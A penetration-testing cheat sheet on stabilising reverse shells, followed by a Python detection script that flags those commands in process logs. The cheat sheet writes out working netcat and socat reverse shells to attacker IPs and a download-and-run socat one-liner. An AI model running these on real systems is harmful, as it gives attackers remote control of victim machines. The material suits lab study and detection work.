Shell Balancing
After initial access to a machine we need to stabilize our shell. There are various ways to do this, and we will look over them below.
Example of Bad shell
Upgrade reverse shell to fully usable TTY shell
rlwrap
When receiving the connection from the target machine we can use rlwrap. We can also mitigate some of the restrictions of poor netcat shells by wrapping the netcat listener with the rlwrap command. It is not installed by default, so we need to install it using sudo apt install rlwrap.
rlwrap nc -lvnp $port
Using env-call and script
This is a generic shell command that gives us the default system shell.
SHELL=/bin/bash script -q /dev/null
Using Script
script comes pre-installed; check the man page.
-q is for quiet, -c is for command.
/usr/bin/script -qc /bin/bash /dev/null
ctrl+z
stty raw -echo; fg; reset
Python
Python is a great tool for balancing the shell.
# on victim machine
python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
ctrl+z
# on attacker machine
stty raw -echo
fg
# on victim machine
reset
export SHELL=bash
export TERM=xterm-256color
stty rows <num> columns <cols>
Perl
If Python is not installed, or Perl is available on the box, then we can use this.
perl -e 'exec "/bin/sh";'
Ruby
If Ruby is installed on the box.
exec "/bin/sh"
ruby -e 'exec "/bin/sh"'
Lua
lua -e "os.execute('/bin/sh')"
Copy over NC and spawn a shell
Using wget and Python's SimpleHTTPServer, nc was easily moved over to the target.
Here we copy nc to the victim machine and then receive the shell.
# Attacker Machine
cp /usr/bin/nc . ; python -m SimpleHTTPServer 9998
nc -nlvp 9998
# Victim Machine
cd /tmp; wget http://10.x.x.x:9998/nc; chmod +x nc
./nc 10.x.x.x 9998 -e /bin/bash
Socat
Never use nc while receiving connections; use socat instead, as it will give you a more generic shell, like SSH.
# Attacker Machine
socat file:`tty`,raw,echo=0 TCP-L:1234
# Victim Machine
/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:1234
# if socat is not present then we can use the binary
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:1234
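From the defender's side, the commands above leave recognizable process command lines. The following is an added example, not part of the original page, that flags them in process-execution records and raises severity when the parent is a service process; the record fields, rule names and the SERVICE_PARENTS list are assumptions, and the sample events are constructed.

```python
import re

# Patterns derived from the TTY-upgrade commands listed on this page.
RULES = {
    "python-pty-spawn": re.compile(r"\bpython[\d.]*\s+-c\s+.*\bpty\.spawn\("),
    "script-to-devnull": re.compile(r"(?:^|[\s/])script\s+-q\S*\s+(?:\S+\s+)?/dev/null\b"),
    "interp-exec-shell": re.compile(
        r"\b(?:perl|ruby|lua)[\d.]*\s+-e\s+.*\bexec(?:ute)?\b.*/bin/(?:ba)?sh\b"),
    "nc-exec-shell": re.compile(r"(?:^|[\s/])(?:nc|ncat|netcat)\s.*\s-e\s+\S*sh\b"),
    "socat-exec-pty": re.compile(r"\bsocat\s+.*\bexec:.*\bpty\b"),
}

# Assumption: parents that should never start an interactive shell on this host.
SERVICE_PARENTS = {"apache2", "nginx", "php-fpm", "java", "node"}


def triage(events):
    """Return (pid, rule, severity) for each event whose command line matches a rule."""
    hits = []
    for ev in events:
        for name, pattern in RULES.items():
            if pattern.search(ev["cmdline"]):
                sev = "high" if ev["parent"] in SERVICE_PARENTS else "medium"
                hits.append((ev["pid"], name, sev))
                break  # one label per process is enough for triage
    return hits


# Constructed sample records (not real telemetry); 192.0.2.10 is a documentation address.
SAMPLE_EVENTS = [
    {"pid": 4101, "parent": "apache2", "cmdline": "python3 -c import pty;pty.spawn(\"/bin/bash\")"},
    {"pid": 4102, "parent": "sh", "cmdline": "/usr/bin/script -qc /bin/bash /dev/null"},
    {"pid": 4103, "parent": "bash", "cmdline": "script -q session.log"},  # benign recording
    {"pid": 4104, "parent": "php-fpm",
     "cmdline": "/tmp/socat exec:bash -li,pty,stderr,setsid,sigint,sane tcp:192.0.2.10:1234"},
    {"pid": 4105, "parent": "sh", "cmdline": "./nc 192.0.2.10 9998 -e /bin/bash"},
    {"pid": 4106, "parent": "node", "cmdline": "lua -e os.execute('/bin/sh')"},
    {"pid": 4107, "parent": "bash", "cmdline": "python3 -m http.server 8000"},  # benign
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit)
```

The regexes match on the joined argv, so an environment prefix such as SHELL=/bin/bash does not appear in the input and is not needed for a match.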